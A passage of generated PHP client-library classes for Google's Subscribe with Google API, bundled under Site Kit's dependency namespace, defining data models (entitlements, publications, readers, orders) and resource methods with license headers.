Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class PlanEntitlement extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'productIds'; /** * @var string */ public $expireTime; /** * @var string[] */ public $productIds; /** * @var string */ public $source; /** * @var string */ public $subscriptionToken; /** * @param string */ public function setExpireTime($expireTime) { $this->expireTime = $expireTime; } /** * @return string */ public function getExpireTime() { return $this->expireTime; } /** * @param string[] */ public function setProductIds($productIds) { $this->productIds = $productIds; } /** * @return string[] */ public function getProductIds() { return $this->productIds; } /** * @param string */ public function setSource($source) { $this->source = $source; } /** * @return string */ public function getSource() { return $this->source; } /** * @param string */ public function setSubscriptionToken($subscriptionToken) { $this->subscriptionToken = $subscriptionToken; } /** * @return string */ public function getSubscriptionToken() { return $this->subscriptionToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\PlanEntitlement::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_PlanEntitlement'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class ListPublicationsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'publications'; /** * @var string */ public $nextPageToken; protected $publicationsType = \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Publication::class; protected $publicationsDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param Publication[] */ public function setPublications($publications) { $this->publications = $publications; } /** * @return Publication[] */ public function getPublications() { return $this->publications; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\ListPublicationsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_ListPublicationsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class BusinessPredicates extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $canSell; /** * @var bool */ public $supportsSiteKit; /** * @param bool */ public function setCanSell($canSell) { $this->canSell = $canSell; } /** * @return bool */ public function getCanSell() { return $this->canSell; } /** * @param bool */ public function setSupportsSiteKit($supportsSiteKit) { $this->supportsSiteKit = $supportsSiteKit; } /** * @return bool */ public function getSupportsSiteKit() { return $this->supportsSiteKit; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\BusinessPredicates::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_BusinessPredicates'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class PaymentOptions extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $contributions; /** * @var bool */ public $noPayment; /** * @var bool */ public $subscriptions; /** * @var bool */ public $thankStickers; /** * @param bool */ public function setContributions($contributions) { $this->contributions = $contributions; } /** * @return bool */ public function getContributions() { return $this->contributions; } /** * @param bool */ public function setNoPayment($noPayment) { $this->noPayment = $noPayment; } /** * @return bool */ public function getNoPayment() { return $this->noPayment; } /** * @param bool */ public function setSubscriptions($subscriptions) { $this->subscriptions = $subscriptions; } /** * @return bool */ public function getSubscriptions() { return $this->subscriptions; } /** * @param bool */ public function setThankStickers($thankStickers) { $this->thankStickers = $thankStickers; } /** * @return bool */ public function getThankStickers() { return $this->thankStickers; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\PaymentOptions::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_PaymentOptions'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class Entitlement extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'products'; /** * @var string */ public $name; /** * @var string[] */ public $products; /** * @var string */ public $readerId; /** * @var string */ public $source; /** * @var string */ public $subscriptionToken; /** * @var string */ public $userId; /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string[] */ public function setProducts($products) { $this->products = $products; } /** * @return string[] */ public function getProducts() { return $this->products; } /** * @param string */ public function setReaderId($readerId) { $this->readerId = $readerId; } /** * @return string */ public function getReaderId() { return $this->readerId; } /** * @param string */ public function setSource($source) { $this->source = $source; } /** * @return string */ public function getSource() { return $this->source; } /** * @param string */ public function setSubscriptionToken($subscriptionToken) { $this->subscriptionToken = $subscriptionToken; } /** * @return string */ public function getSubscriptionToken() { return $this->subscriptionToken; } /** * @param string */ public function setUserId($userId) { $this->userId = $userId; } /** * @return string */ public function getUserId() { return $this->userId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Entitlement::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_Entitlement'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class Product extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $name; /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Product::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_Product'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class PublicationPredicates extends \Google\Site_Kit_Dependencies\Google\Model { protected $businessPredicatesType = \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\BusinessPredicates::class; protected $businessPredicatesDataType = ''; /** * @param BusinessPredicates */ public function setBusinessPredicates(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\BusinessPredicates $businessPredicates) { $this->businessPredicates = $businessPredicates; } /** * @return BusinessPredicates */ public function getBusinessPredicates() { return $this->businessPredicates; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\PublicationPredicates::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_PublicationPredicates'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class ListUserEntitlementsPlansResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'userEntitlementsPlans'; /** * @var string */ public $nextPageToken; protected $userEntitlementsPlansType = \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\UserEntitlementsPlan::class; protected $userEntitlementsPlansDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param UserEntitlementsPlan[] */ public function setUserEntitlementsPlans($userEntitlementsPlans) { $this->userEntitlementsPlans = $userEntitlementsPlans; } /** * @return UserEntitlementsPlan[] */ public function getUserEntitlementsPlans() { return $this->userEntitlementsPlans; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\ListUserEntitlementsPlansResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_ListUserEntitlementsPlansResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class SuspendedDetails extends \Google\Site_Kit_Dependencies\Google\Model { } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\SuspendedDetails::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_SuspendedDetails'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class Order extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'stateDetails'; /** * @var string */ public $name; /** * @var string */ public $orderId; protected $stateDetailsType = \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\StateDetails::class; protected $stateDetailsDataType = 'array'; /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setOrderId($orderId) { $this->orderId = $orderId; } /** * @return string */ public function getOrderId() { return $this->orderId; } /** * @param StateDetails[] */ public function setStateDetails($stateDetails) { $this->stateDetails = $stateDetails; } /** * @return StateDetails[] */ public function getStateDetails() { return $this->stateDetails; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Order::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_Order'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class Money extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $currencyCode; /** * @var int */ public $nanos; /** * @var string */ public $units; /** * @param string */ public function setCurrencyCode($currencyCode) { $this->currencyCode = $currencyCode; } /** * @return string */ public function getCurrencyCode() { return $this->currencyCode; } /** * @param int */ public function setNanos($nanos) { $this->nanos = $nanos; } /** * @return int */ public function getNanos() { return $this->nanos; } /** * @param string */ public function setUnits($units) { $this->units = $units; } /** * @return string */ public function getUnits() { return $this->units; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Money::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_Money'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class StateDetails extends \Google\Site_Kit_Dependencies\Google\Model { protected $amountType = \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Money::class; protected $amountDataType = ''; /** * @var string */ public $orderState; /** * @var string */ public $time; /** * @param Money */ public function setAmount(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Money $amount) { $this->amount = $amount; } /** * @return Money */ public function getAmount() { return $this->amount; } /** * @param string */ public function setOrderState($orderState) { $this->orderState = $orderState; } /** * @return string */ public function getOrderState() { return $this->orderState; } /** * @param string */ public function setTime($time) { $this->time = $time; } /** * @return string */ public function getTime() { return $this->time; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\StateDetails::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_StateDetails'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class RecurringPlanDetails extends \Google\Site_Kit_Dependencies\Google\Model { protected $canceledDetailsType = \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\CanceledDetails::class; protected $canceledDetailsDataType = ''; protected $recurrenceTermsType = \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\RecurrenceTerms::class; protected $recurrenceTermsDataType = ''; /** * @var string */ public $recurringPlanState; protected $suspendedDetailsType = \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\SuspendedDetails::class; protected $suspendedDetailsDataType = ''; /** * @var string */ public $updateTime; protected $waitingToRecurDetailsType = \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\WaitingToRecurDetails::class; protected $waitingToRecurDetailsDataType = ''; /** * @param CanceledDetails */ public function setCanceledDetails(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\CanceledDetails $canceledDetails) { $this->canceledDetails = $canceledDetails; } /** * @return CanceledDetails */ public function getCanceledDetails() { return $this->canceledDetails; } /** * @param RecurrenceTerms */ public function setRecurrenceTerms(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\RecurrenceTerms $recurrenceTerms) { $this->recurrenceTerms = $recurrenceTerms; } /** * @return RecurrenceTerms */ public function getRecurrenceTerms() { return $this->recurrenceTerms; } /** * @param string */ public function setRecurringPlanState($recurringPlanState) { $this->recurringPlanState = $recurringPlanState; } /** * @return string */ public function getRecurringPlanState() { return $this->recurringPlanState; } /** * @param SuspendedDetails */ public function setSuspendedDetails(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\SuspendedDetails $suspendedDetails) { $this->suspendedDetails = $suspendedDetails; } /** * @return SuspendedDetails */ public function getSuspendedDetails() { return $this->suspendedDetails; } /** * @param string */ public function setUpdateTime($updateTime) { $this->updateTime = $updateTime; } /** * @return string */ public function getUpdateTime() { return $this->updateTime; } /** * @param WaitingToRecurDetails */ public function setWaitingToRecurDetails(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\WaitingToRecurDetails $waitingToRecurDetails) { $this->waitingToRecurDetails = $waitingToRecurDetails; } /** * @return WaitingToRecurDetails */ public function getWaitingToRecurDetails() { return $this->waitingToRecurDetails; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\RecurringPlanDetails::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_RecurringPlanDetails'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class ListEntitlementsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'entitlements'; protected $entitlementsType = \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Entitlement::class; protected $entitlementsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param Entitlement[] */ public function setEntitlements($entitlements) { $this->entitlements = $entitlements; } /** * @return Entitlement[] */ public function getEntitlements() { return $this->entitlements; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\ListEntitlementsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_ListEntitlementsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class Reader extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $displayName; /** * @var string */ public $emailAddress; /** * @var string */ public $familyName; /** * @var string */ public $givenName; /** * @var bool */ public $isReaderInfoAvailable; /** * @var string */ public $name; /** * @var string */ public $readerId; /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setEmailAddress($emailAddress) { $this->emailAddress = $emailAddress; } /** * @return string */ public function getEmailAddress() { return $this->emailAddress; } /** * @param string */ public function setFamilyName($familyName) { $this->familyName = $familyName; } /** * @return string */ public function getFamilyName() { return $this->familyName; } /** * @param string */ public function setGivenName($givenName) { $this->givenName = $givenName; } /** * @return string */ public function getGivenName() { return $this->givenName; } /** * @param bool */ public function setIsReaderInfoAvailable($isReaderInfoAvailable) { $this->isReaderInfoAvailable = $isReaderInfoAvailable; } /** * @return bool */ public function getIsReaderInfoAvailable() { return $this->isReaderInfoAvailable; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setReaderId($readerId) { $this->readerId = $readerId; } /** * @return string */ public function getReaderId() { return $this->readerId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Reader::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_Reader'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle; class Publication extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'verifiedDomains'; /** * @var string */ public $displayName; /** * @var string */ public $onboardingState; protected $paymentOptionsType = \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\PaymentOptions::class; protected $paymentOptionsDataType = ''; protected $productsType = \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Product::class; protected $productsDataType = 'array'; /** * @var string */ public $publicationId; protected $publicationPredicatesType = \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\PublicationPredicates::class; protected $publicationPredicatesDataType = ''; /** * @var string[] */ public $verifiedDomains; /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setOnboardingState($onboardingState) { $this->onboardingState = $onboardingState; } /** * @return string */ public function getOnboardingState() { return $this->onboardingState; } /** * @param PaymentOptions */ public function setPaymentOptions(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\PaymentOptions $paymentOptions) { $this->paymentOptions = $paymentOptions; } /** * @return PaymentOptions */ public function getPaymentOptions() { return $this->paymentOptions; } /** * @param Product[] */ public function setProducts($products) { $this->products = $products; } /** * @return Product[] */ public function getProducts() { return $this->products; } /** * @param string */ public function setPublicationId($publicationId) { $this->publicationId = $publicationId; } /** * @return string */ public function getPublicationId() { return $this->publicationId; } /** * @param PublicationPredicates */ public function setPublicationPredicates(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\PublicationPredicates $publicationPredicates) { $this->publicationPredicates = $publicationPredicates; } /** * @return PublicationPredicates */ public function getPublicationPredicates() { return $this->publicationPredicates; } /** * @param string[] */ public function setVerifiedDomains($verifiedDomains) { $this->verifiedDomains = $verifiedDomains; } /** * @return string[] */ public function getVerifiedDomains() { return $this->verifiedDomains; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Publication::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_Publication'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Resource; use Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\ListUserEntitlementsPlansResponse; use Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\UserEntitlementsPlan; /** * The "entitlementsplans" collection of methods. * Typical usage is: * <code> * $subscribewithgoogleService = new Google\Service\SubscribewithGoogle(...); * $entitlementsplans = $subscribewithgoogleService->publications_readers_entitlementsplans; * </code> */ class PublicationsReadersEntitlementsplans extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Gets the entitlements plan identitfied by plan id for a given user under the * given publication. (entitlementsplans.get) * * @param string $name Required. The resource name of the UserEntitlementsPlan. * Format: publications/{publication}/readers/{reader}/entitlementsplans/{plan} * @param array $optParams Optional parameters. * @return UserEntitlementsPlan * @throws \Google\Service\Exception */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\UserEntitlementsPlan::class); } /** * Lists all the entitlements plans for a given user under a given publication. * (entitlementsplans.listPublicationsReadersEntitlementsplans) * * @param string $parent Required. The parent, which owns this collection of * UserEntitlementsPlans. Format: publications/{publication}/readers/{reader} * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of UserEntitlementsPlans to * return. The service may return fewer than this value. If unspecified, at most * 100 UserEntitlementsPlans will be returned. The maximum value is 1000; values * above 1000 will be coerced to 1000. * @opt_param string pageToken A token identifying a page of results the server * should return. Typically, this is the value of * ListUserEntitlementsPlansResponse.next_page_token returned from the previous * call to `ListUserEntitlementsPlans` method. * @return ListUserEntitlementsPlansResponse * @throws \Google\Service\Exception */ public function listPublicationsReadersEntitlementsplans($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\ListUserEntitlementsPlansResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Resource\PublicationsReadersEntitlementsplans::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_Resource_PublicationsReadersEntitlementsplans'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Resource; use Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\ListEntitlementsResponse; /** * The "entitlements" collection of methods. * Typical usage is: * <code> * $subscribewithgoogleService = new Google\Service\SubscribewithGoogle(...); * $entitlements = $subscribewithgoogleService->publications_entitlements; * </code> */ class PublicationsEntitlements extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Gets a set of entitlements for the user for this publication. The publication * can fetch entitlements on behalf of a user authenticated via OAuth2. * (entitlements.listPublicationsEntitlements) * * @param string $publicationId Mapped to the URL. * @param array $optParams Optional parameters. * * @opt_param int pageSize Requested page size. If unspecified, server will pick * an appropriate default. * @opt_param string pageToken A token identifying a page of results the server * should return. Typically, this is the value of * ListEntitlementsResponse.next_page_token returned from the previous call to * `ListEntitlements` method. * @return ListEntitlementsResponse * @throws \Google\Service\Exception */ public function listPublicationsEntitlements($publicationId, $optParams = []) { $params = ['publicationId' => $publicationId]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\ListEntitlementsResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Resource\PublicationsEntitlements::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SubscribewithGoogle_Resource_PublicationsEntitlements'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\Resource; use Google\Site_Kit_Dependencies\Google\Service\SubscribewithGoogle\ListPublicationsResponse; /** * The "publications" collection of methods. * Typical usage is: * <code> * $subscribewithgoogleService = new Google\Service\SubscribewithGoogle(...); * $publications = $subscribewithgoogleService->publications; * </code> */ class Publications extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * List all publications based on the filter, only the publications owned by the * current user will be returned (publications.listPublications) * * @param array $optParams Optional parameters. * * @opt_param string filter Filters the publications list. e.g. * verified_domains: "xyz.com" Grammar defined as https://google.aip.dev/160. * @opt_param int pageSize LINT.IfChange The maximum number of publications to * return, the service may return fewer than this value. if unspecified, at most * 100 publications will be returned. The maximum value is 1000; values above * 1000 will be coerced to 1000. 